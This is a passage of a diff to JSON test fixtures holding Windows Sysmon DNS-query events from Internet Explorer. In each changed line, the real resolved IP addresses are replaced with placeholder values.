Name='QueryName'\u003ex.bidswitch.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { "@timestamp": "2021-05-05T15:30:51.701Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029880600Z'/\u003e\u003cEventRecordID\u003e130\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.pixel.adsafeprotected.com;::ffff:199.166.0.26;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029880600Z'/\u003e\u003cEventRecordID\u003e130\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.pixel.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -4051,7 +4051,7 @@ "event_data": { "QueryName": "pixel.adsafeprotected.com", "QueryStatus": "0", - "QueryResults": "type: 5 anycast.pixel.adsafeprotected.com;::ffff:199.166.0.26;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 anycast.pixel.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.894", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -4070,7 +4070,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029890100Z'/\u003e\u003cEventRecordID\u003e131\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eml314.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.171.48.231;::ffff:52.206.107.32;::ffff:35.175.80.59;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029890100Z'/\u003e\u003cEventRecordID\u003e131\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eml314.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -4082,7 +4082,7 @@ "level": "information", "event_data": { "QueryStatus": "0", - "QueryResults": "::ffff:35.171.48.231;::ffff:52.206.107.32;::ffff:35.175.80.59;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.894", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -4112,7 +4112,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029900000Z'/\u003e\u003cEventRecordID\u003e132\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.902\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eaa.agkn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:156.154.200.36;::ffff:63.251.88.56;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029900000Z'/\u003e\u003cEventRecordID\u003e132\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.902\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eaa.agkn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -4126,7 +4126,7 @@ "ProcessId": "2736", "QueryName": "aa.agkn.com", "QueryStatus": "0", - "QueryResults": "::ffff:156.154.200.36;::ffff:63.251.88.56;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.902", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -4155,7 +4155,7 @@ "ProcessId": "2736", "QueryName": "s0.2mdn.net", "QueryStatus": "0", - "QueryResults": "type: 5 s0-2mdn-net.l.google.com;::ffff:172.217.10.134;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 s0-2mdn-net.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.911", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -4185,7 +4185,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029909900Z'/\u003e\u003cEventRecordID\u003e133\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es0.2mdn.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 s0-2mdn-net.l.google.com;::ffff:172.217.10.134;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029909900Z'/\u003e\u003cEventRecordID\u003e133\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es0.2mdn.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 s0-2mdn-net.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } @@ -4196,7 +4196,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029920400Z'/\u003e\u003cEventRecordID\u003e134\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:23.50.53.195;::ffff:23.50.53.185;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029920400Z'/\u003e\u003cEventRecordID\u003e134\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -4225,7 +4225,7 @@ "ProcessId": "2736", "QueryName": "b.scorecardresearch.com", "QueryStatus": "0", - "QueryResults": "type: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:23.50.53.195;::ffff:23.50.53.185;", + "QueryResults": "type: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.911", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -4250,7 +4250,7 @@ "ProcessId": "2736", "QueryName": "edw.edmunds.com", "QueryStatus": "0", - "QueryResults": "type: 5 f2.shared.global.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;", + "QueryResults": "type: 5 f2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.921", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -4268,7 +4268,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.548958100Z'/\u003e\u003cEventRecordID\u003e135\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.921\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eedw.edmunds.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.shared.global.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.548958100Z'/\u003e\u003cEventRecordID\u003e135\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.921\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eedw.edmunds.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -4280,7 +4280,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692712500Z'/\u003e\u003cEventRecordID\u003e136\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.101\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.digicert.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 